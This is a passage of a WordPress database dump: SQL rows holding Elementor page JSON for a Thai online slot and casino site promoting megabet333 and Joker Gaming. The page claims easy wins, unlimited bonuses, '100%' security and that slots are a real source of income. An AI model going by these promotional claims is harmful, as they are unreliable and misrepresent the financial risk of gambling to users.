\\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d Joker Gaming \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e04\\u0e27\\u0e49\\u0e32\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49 \\u0e40\\u0e0a\\u0e48\\u0e19 Roma X, Queen 2, \\u0e41\\u0e25\\u0e30 Joker Madness \\u0e25\\u0e49\\u0e27\\u0e19\\u0e21\\u0e35\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e15\\u0e49\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e20\\u0e32\\u0e29\\u0e32\\u0e44\\u0e17\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07\\u0e14\\u0e38\\u0e14\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e08\\u0e4a\\u0e01\\u0e40\\u0e01\\u0e2d\\u0e23\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e04\\u0e27\\u0e23\\u0e1e\\u0e25\\u0e32\\u0e14 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e17\\u0e35\\u0e48\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_3_-_Megabet333-Biz.webp\",\"id\":52,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1434,174,'_thumbnail_id','60'),(1435,174,'_elementor_edit_mode','builder'),(1436,174,'_elementor_template_type','wp-page'),(1437,174,'_elementor_version','3.32.5'),(1438,174,'_elementor_pro_version','3.32.3'),(1439,174,'_wp_page_template','default'),(1440,174,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1441,174,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span 